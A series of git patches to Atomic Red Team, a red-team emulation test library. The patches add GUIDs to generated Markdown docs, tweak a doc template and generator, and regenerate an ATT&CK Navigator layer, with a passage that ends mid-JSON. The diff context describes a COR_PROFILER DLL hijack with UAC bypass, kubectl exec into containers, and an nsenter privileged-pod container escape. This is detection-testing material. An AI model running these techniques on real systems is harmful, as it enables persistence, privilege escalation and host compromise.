## Atomic Test #1 - User scope COR_PROFILER + +auto_generated_guid: 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a + Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER). The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by the Event Viewer process. Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. @@ -25,14 +28,13 @@ If the account used is not a local administrator the profiler DLL will still exe the notepad process will not execute with high integrity. Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_name | unmanaged profiler DLL | Path | PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll| | clsid_guid | custom clsid guid | String | {09108e71-974c-4010-89cb-acf471ae9e2c}| @@ -65,7 +67,7 @@ Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -Force -Er ##### Description: #{file_name} must be present ##### Check Prereq Commands: ```powershell -if (Test-Path #{file_name}) {exit 0} else {exit 1} +if (Test-Path #{file_name}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -80,20 +82,22 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - System Scope COR_PROFILER + +auto_generated_guid: f373b482-48c8-4ce4-85ed-d40c8b3f7310 + Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect. The unmanaged profiler DLL (T1574.012x64.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity. Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_name | unmanaged profiler DLL | Path | PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll| | clsid_guid | custom clsid guid | String | {09108e71-974c-4010-89cb-acf471ae9e2c}| @@ -122,7 +126,7 @@ Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manage ##### Description: #{file_name} must be present ##### Check Prereq Commands: ```powershell -if (Test-Path #{file_name}) {exit 0} else {exit 1} +if (Test-Path #{file_name}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -137,17 +141,19 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #3 - Registry-free process scope COR_PROFILER + +auto_generated_guid: 79d57242-bbef-41db-b301-9d01d9f6e817 + Creates process scope environment variables to enable a .NET profiler (COR_PROFILER) without making changes to the registry. The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by PowerShell. Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_name | unamanged profiler DLL | Path | PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll| | clsid_guid | custom clsid guid | String | {09108e71-974c-4010-89cb-acf471ae9e2c}| @@ -176,7 +182,7 @@ $env:COR_PROFILER_PATH = '' ##### Description: #{file_name} must be present ##### Check Prereq Commands: ```powershell -if (Test-Path #{file_name}) {exit 0} else {exit 1} +if (Test-Path #{file_name}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1609/T1609.md b/atomics/T1609/T1609.md index 801cec20..292c6f39 100644 --- a/atomics/T1609/T1609.md +++ b/atomics/T1609/T1609.md @@ -12,15 +12,17 @@ In Docker, adversaries may specify an entrypoint during container deployment tha
## Atomic Test #1 - ExecIntoContainer -Attackers who have permissions, can run malicious commands in containers in the cluster using exec command (“kubectl exec”). In this method, attackers can use legitimate images, such as an OS image (e.g., Ubuntu) as a backdoor container, and run their malicious code remotely by using “kubectl exec”. +auto_generated_guid: d03bfcd3-ed87-49c8-8880-44bb772dea4b + +Attackers who have permissions, can run malicious commands in containers in the cluster using exec command (“kubectl exec”). In this method, attackers can use legitimate images, such as an OS image (e.g., Ubuntu) as a backdoor container, and run their malicious code remotely by using “kubectl exec”. **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | namespace | K8s namespace to use | String | default| | command | Command to run | String | uname| diff --git a/atomics/T1610/T1610.md b/atomics/T1610/T1610.md index 32a1c397..c1e1dbd6 100644 --- a/atomics/T1610/T1610.md +++ b/atomics/T1610/T1610.md @@ -12,12 +12,14 @@ Containers can be deployed by various means, such as via Docker's create ## Atomic Test #1 - Deploy container using nsenter container escape + +auto_generated_guid: 58004e22-022c-4c51-b4a8-2b85ac5c596b + In this escape `kubectl` is used to launch a new pod, with a container that has the host pids mapped into the container (`hostPID:true`). It uses the alpine linux container image. It runs with privilege on the host (`privileged:true`). When the container is launched the command `nsenter --mount=/proc/1/ns/mnt -- /bin/bash` is ran. Since the host processes have been mapped into the container, the container enters the host namespace, escaping the container. Additional Details: - https://twitter.com/mauilion/status/1129468485480751104 - https://securekubernetes.com/scenario_2_attack/ - **Supported Platforms:** Linux 
@@ -42,7 +44,7 @@ kubectl --context kind-atomic-cluster delete pod atomic-escape-pod ##### Description: Verify docker is installed. ##### Check Prereq Commands: ```sh -which docker +which docker ``` ##### Get Prereq Commands: ```sh @@ -51,7 +53,7 @@ if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt ##### Description: Verify docker service is running. ##### Check Prereq Commands: ```sh -sudo systemctl status docker +sudo systemctl status docker ``` ##### Get Prereq Commands: ```sh @@ -60,7 +62,7 @@ sudo systemctl start docker ##### Description: Verify kind is in the path. ##### Check Prereq Commands: ```sh -which kind +which kind ``` ##### Get Prereq Commands: ```sh @@ -71,7 +73,7 @@ mv kind /usr/bin/kind ##### Description: Verify kind-atomic-cluster is created ##### Check Prereq Commands: ```sh -sudo kind get clusters +sudo kind get clusters ``` ##### Get Prereq Commands: ```sh @@ -80,7 +82,7 @@ sudo kind create cluster --name atomic-cluster ##### Description: Verify kubectl is in path ##### Check Prereq Commands: ```sh -which kubectl +which kubectl ``` ##### Get Prereq Commands: ```sh diff --git a/atomics/T1611/T1611.md b/atomics/T1611/T1611.md index 44fbe47a..b39e3b53 100644 --- a/atomics/T1611/T1611.md +++ b/atomics/T1611/T1611.md @@ -12,12 +12,14 @@ There are multiple ways an adversary may escape to a host environment. Examples
## Atomic Test #1 - Deploy container using nsenter container escape + +auto_generated_guid: 0b2f9520-a17a-4671-9dba-3bd034099fff + In this escape `kubectl` is used to launch a new pod, with a container that has the host pids mapped into the container (`hostPID:true`). It uses the alpine linux container image. It runs with privilege on the host (`privileged:true`). When the container is launched the command `nsenter --mount=/proc/1/ns/mnt -- /bin/bash` is ran. Since the host processes have been mapped into the container, the container enters the host namespace, escaping the container. Additional Details: - https://twitter.com/mauilion/status/1129468485480751104 - https://securekubernetes.com/scenario_2_attack/ - **Supported Platforms:** Linux @@ -42,7 +44,7 @@ kubectl --context kind-atomic-cluster delete pod atomic-escape-pod ##### Description: Verify docker is installed. ##### Check Prereq Commands: ```sh -which docker +which docker ``` ##### Get Prereq Commands: ```sh @@ -51,7 +53,7 @@ if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt ##### Description: Verify docker service is running. ##### Check Prereq Commands: ```sh -sudo systemctl status docker +sudo systemctl status docker ``` ##### Get Prereq Commands: ```sh @@ -60,7 +62,7 @@ sudo systemctl start docker ##### Description: Verify kind is in the path. ##### Check Prereq Commands: ```sh -which kind +which kind ``` ##### Get Prereq Commands: ```sh @@ -71,7 +73,7 @@ mv kind /usr/bin/kind ##### Description: Verify kind-atomic-cluster is created ##### Check Prereq Commands: ```sh -sudo kind get clusters +sudo kind get clusters ``` ##### Get Prereq Commands: ```sh @@ -80,7 +82,7 @@ sudo kind create cluster --name atomic-cluster ##### Description: Verify kubectl is in path ##### Check Prereq Commands: ```sh -which kubectl +which kubectl ``` ##### Get Prereq Commands: ```sh From 157af0ce47cac52a0d9f2873a882db3c7d51e36d Mon Sep 17 00:00:00 2001 
From: Carrie Roberts
Date: Thu, 24 Jun 2021 09:24:23 -0600
Subject: [PATCH 65/84] move guid under description in MD file and make bold
---
atomic_red_team/atomic_doc_template.md.erb | 8 +++++---
1 file changed, 5 insertions(+), 3 deletions(-)
diff --git a/atomic_red_team/atomic_doc_template.md.erb b/atomic_red_team/atomic_doc_template.md.erb
index 62a77d6f..d2dbbe9b 100644
--- a/atomic_red_team/atomic_doc_template.md.erb
+++ b/atomic_red_team/atomic_doc_template.md.erb
@@ -13,11 +13,9 @@
## Atomic Test #<%= test_number+1 %> - <%= test['name'] %> - -auto_generated_guid: <%= test['auto_generated_guid'] %> - <%= test['description'].strip -%> + **Supported Platforms:** <%= test['supported_platforms'].collect do |p| case p when 'macos' @@ -27,6 +25,10 @@ auto_generated_guid: <%= test['auto_generated_guid'] %> end end.join(', ') %> + +**auto_generated_guid:** <%= test['auto_generated_guid'] %> + + <%def cleanup(input) input.to_s.strip.gsub(/\\/,"\") end%> From d5c5979247a1e4ed8a410e6621ee6b103512cfb5 Mon Sep 17 00:00:00 2001 From: Jose Enrique Hernandez Date: Thu, 24 Jun 2021 11:31:51 -0400 Subject: [PATCH 66/84] adding url md file for each atomic as a comment (#1530) --- bin/generate-atomic-docs.rb | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/bin/generate-atomic-docs.rb b/bin/generate-atomic-docs.rb index f396d563..3e4e0078 100755 --- a/bin/generate-atomic-docs.rb +++ b/bin/generate-atomic-docs.rb @@ -212,12 +212,14 @@ class AtomicRedTeamDocs technique = { "techniqueID" => atomic_yaml['attack_technique'], "score" => 100, - "enabled" => true + "enabled" => true, + "comment" => "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/" + atomic_yaml['attack_technique'] + "/" + atomic_yaml['attack_technique'] + ".md" } techniqueParent = { "techniqueID" => atomic_yaml['attack_technique'].split('.')[0], "score" => 100, - "enabled" => true + "enabled" => true, + "comment" => "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/" + atomic_yaml['attack_technique'] + "/" + atomic_yaml['attack_technique'] + ".md" } techniques.push(technique) From bedaf8bbd5cc9df045bd8687e0460ab463afbd4b Mon Sep 17 00:00:00 2001 
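Review bot: The link in the two added `"comment"` entries is built by concatenating `atomic_yaml['attack_technique']` straight into the URL with no check that the value has the expected technique-ID shape, so a malformed `attack_technique` in a test YAML (stray whitespace, a `/`, a lower-case `t`) silently yields a broken link in the published navigator layer instead of failing the doc build. The base URL literal is also repeated in both `technique` and `techniqueParent`; binding it once, e.g. `tid = atomic_yaml['attack_technique']` and `"comment" => "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/#{tid}/#{tid}.md"`, guarded by something like `raise "unexpected attack_technique: #{tid}" unless tid =~ /\AT\d{4}(\.\d{3})?\z/`, keeps the two in sync and makes bad input loud. Note that `techniqueParent` keys on `attack_technique.split('.')[0]` while its comment points at the sub-technique page (the regenerated layer in the following patch shows `T1003` linking to `T1003.007.md`); if that deep-link is intended, a one-line comment saying the parent entry deliberately points at the contributing sub-technique's page would save the next reader a double-take. The enclosing method of `AtomicRedTeamDocs` begins before the hunk and continues past `techniques.push(technique)`.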
From: CircleCI Atomic Red Team doc generator
Date: Thu, 24 Jun 2021 15:32:29 +0000
Subject: [PATCH 67/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
---
.../Attack-Navigator-Layers/art-navigator-layer-linux.json | 2 +-
.../Attack-Navigator-Layers/art-navigator-layer-macos.json | 2 +-
.../Attack-Navigator-Layers/art-navigator-layer-windows.json | 2 +-
.../Indexes/Attack-Navigator-Layers/art-navigator-layer.json | 2 +-
4 files changed, 4 insertions(+), 4 deletions(-)
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
index cdeac0bd..5358846e 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
@@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.007","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.005","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true
},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1110.004","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},
{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score
":100,"enabled":true}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atom
ics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"tech
niqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059
.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"te
chniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"technique
ID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"com
